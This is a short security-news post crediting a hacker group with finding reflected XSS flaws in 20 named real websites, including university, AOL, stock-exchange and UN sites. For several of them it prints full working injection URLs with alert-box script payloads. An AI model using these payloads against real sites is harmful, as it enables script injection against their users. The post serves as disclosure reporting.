XSS vulnerabilities found in 20 high-profile sites by GOH group

An Indian ethical hacker named Akshay, AKA 0z0n3, belonging to the hacking crew called GOH (godofhackers), has found 20 high-profile sites vulnerable to non-persistent XSS attacks.


The list of vulnerable sites with their screenshots:

1. nyu.edu - vuln link - http://www.nyu.edu/search.html?search=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E - snap - http://i49.tinypic.com/33v2hkz.png

2. barclays.co.uk - snap - http://i46.tinypic.com/wrhlp4.png - status - patched

3. pakistanstockexchange.com - vuln link - http://pakstockexchange.com/stock2/index_new.php?section=research&page=company_chooser_new&keyword=\%27;alert%28String.fromCharCode%2888,83,83%29%29//\\\%27;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//\\\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E\%22%3E\%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E - snap - http://i49.tinypic.com/16huvi9.png

4. lilwaynehq.com - official site of Lil Wayne - vuln link - http://www.lilwaynehq.com/?s=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%20by%200z0n3%20of%20.::[GOH]::.%22%29%3C%2FSCRIPT%3E%22%3E - snap - http://i50.tinypic.com/zugubs.png

5. mercury-pc.com - vuln link - http://www.mercury-pc.com/search.php - snap - http://i48.tinypic.com/b624qa.png

6. transcend.com - vuln link - http://www.transcend-info.com/Support/Search/index.asp - snap - http://i47.tinypic.com/28letjc.png

7. bangladeshtradeinfo.com - vuln link - http://www.bdtradeinfo.com//yellowpages/search.asp?search=%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C/SCRIPT%3E%22%3E - snap - http://i49.tinypic.com/dzc68.png

8. defense.aol.com - vuln link - http://defense.aol.com/search/?q=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E - snap - http://i49.tinypic.com/6fpgeq.png

9. gov.aol.com - vuln link - http://gov.aol.com/search/?q=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E - snap - http://i47.tinypic.com/f0n59x.png

10. http://www.unicc.org/ - http://i39.tinypic.com/352iycw.png

11. http://www.un.org.au - http://i44.tinypic.com/critx.jpg

12. http://unfccc.int - http://i40.tinypic.com/e0qrdf.png

13. http://search2.unaids.org - http://i43.tinypic.com/4gruww.png

14. http://unu.edu - http://i39.tinypic.com/v8odw9.png

15. http://www.unpri.org - http://i41.tinypic.com/20pegsj.png

16. http://www.uneval.org - http://i50.tinypic.com/2w3t2lz.png

17. http://www.unscn.org - http://i49.tinypic.com/11ugo76.jpg

18. http://www.undg.org - http://i45.tinypic.com/2zp2s6v.png

19. http://www.alienwarearena.com/ - http://i47.tinypic.com/vzbwif.png

20. www.games.com - AOL subdomain - http://i47.tinypic.com/33z9v8m.png

About Author

, founder of E Hacking News, an Information Security enthusiast who has more interest in PenTesting and Malware analysis. You can find him on Google+ Profile , Twitter and Facebook.